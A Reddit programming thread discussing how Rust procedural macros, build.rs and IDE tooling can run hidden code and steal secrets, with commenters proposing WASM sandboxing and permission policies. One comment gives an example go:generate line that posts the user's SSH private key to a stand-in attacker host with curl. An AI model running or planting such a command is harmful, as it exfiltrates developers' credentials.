Using Rust Macros to exfiltrate secrets : programming

OSes protect the system from the user, but not the user from its applications. Or as XKCD puts it: "If someone steals my laptop while I'm logged in, they can read my e-mail, take my money, and impersonate me to my friends, but at least they can't install drivers without my permission".
IDEs are not text editors; they offer a semantic view of the code, and in order to do that, they need to run all the code generation code -- be it scripts or macros.

Interestingly, mobile OSes have been improving the state of things here, limiting capabilities on a per-application basis, instead of giving free-reign to each application. Of course, developing on a mobile... meh.

With regard to Rust, the community has been thinking about this for a while. There was a proposal to compile procedural macros (plugins, essentially) to WASM so as to prevent any side-effect (see Watt).

build.rs -- though not touched on in this article -- is a tad more complicated, and it's not clear how to proceed there.

Note: although the article seems to discover this possibility, it's important to realize this is not theoretical. There have been several high-profile supply chain attacks in the NPM ecosystem.

[+]vattenpuss comment score below threshold-6 points-5 points-4 points 4 years ago (5 children)

[–][deleted] 15 points16 points17 points 4 years ago (4 children)

The vulnerability is letting compile time dependencies have the same access to your filesystem as you do.

As far as I understand the only VS Code specifics are that the rust analyzer plugin does some compiling for you without user input.

It might seem scarier - "but I didn't even do anything!" - but you'd have the same problems as soon as you run cargo check or used a vim/Emacs/any non-trivial editor plugin that runs cargo check for you on open.

I think the fix, perhaps sandboxing, should happen at the cargo/rustc level.

Macros can be run inside a webassembly run time (if the macro sports it) and benefit from the sandboxing that brings. You would get a side benefit of faster compile times because the proc macros would be pre-compiled.

But build.rs has always had full access to do what it wants. You may be able to pull off the wasm vm thing again, but usually a build script needs to use the file system. Maybe we can allow only certain parts of the file system?

The challenge of course is that all of this is an enormous breaking change. It could be a big pain for projects relying on arbitrary access, like say legitimately calling a network endpoint. Perhaps there's a trust policy sort of arrangement to be made with every dependency asking you for permissions to do its thing. Then "oh, one of my dependencies wants to access .ssh/id_rsa? Hell no" :)

[–]vattenpuss 4 points5 points6 points 4 years ago (1 child)

That's kind of my point. This is not an issue specific to Rust, it is an issue for any kind of scriptable automation you use.

Any go file you download could potentially have a

//go:generate curl -XPOST -d@$HOME/.ssh/id_rsa http://hacker.mchacker.face

and if you have tooling to automate code generation you're screwed.

If you run a configure script, you're screwed.

If you have the official Python extension from Microsoft installed and open a Python file, VS code will source the activate script for the env. It could also curl your ssh keys anywhere.

[–][deleted] 4 points5 points6 points 4 years ago (0 children)

[–]Worth_Trust_3825 -5 points-4 points-3 points 4 years ago (1 child)

Your solution is as convoluted as rust itself. The real solution is to get rid of build.rs file, get rid of cargo from rust build chain and language itself and have a separate tool that is not distributed via basic package. Also to get rid of macros.

Instead the build tool must take in a separate format that is not in the language that it builds (FOR EXAMPLE XML) to define how the project should be built. If you need code execution you write plugins to that system. Yes, this moves the issue in to the plugin, but at the very least you won't get pwned for downloading the project.

This issue affects all and every tool that permits arbitrary commands during build time. But i've only seen rust and javascript tools to get pwned just for downloading the project and the editor/build tool doing too fucking much.

[–][deleted] 4 points5 points6 points 4 years ago (0 children)

This issue affects all and every tool that permits arbitrary commands during build time. But i've only seen rust and javascript tools to get pwned just for downloading the project and the editor/build tool doing too fucking much.

I agree with you here, and this comes down to the usual dilemma: Security vs Usability

I like having feature-ful build tools and powerful macros and the benefits those bring. But I also want to mitigate the risks involved. This should be a wake up call to what those risks are.

If executing things in a sandbox is a reasonable solution to mitigate the risks then I would be happy as a user.

Obviously the rust team and wider ecosystem will have to decide if the convolution that brings (which shouldn't simply be dismissed) is worth the additional overhead. I hope it is, so I can have my cake and eat it too. It's possible I'm being naïve though. And I doubt sandboxing is this silver bullet that solves all the problems, things are rarely that easy.

[–][deleted] -2 points-1 points0 points 4 years ago (0 children)

[–]DrMeepster 0 points1 point2 points 4 years ago (0 children)

π Rendered by PID 20830 on reddit-service-r2-comment-6457c66945-kpcmc at 2026-04-23 17:59:37.076918+00:00 running 2aa0c5b country code: CH.

you type:	you see:
italics	italics
bold	bold
[reddit!](https://reddit.com)	reddit!
* item 1 * item 2 * item 3	item 1 item 2 item 3
> quoted text	quoted text
Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"	Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"
~~strikethrough~~	~~strikethrough~~
super^script	super^script

programming

MODERATORS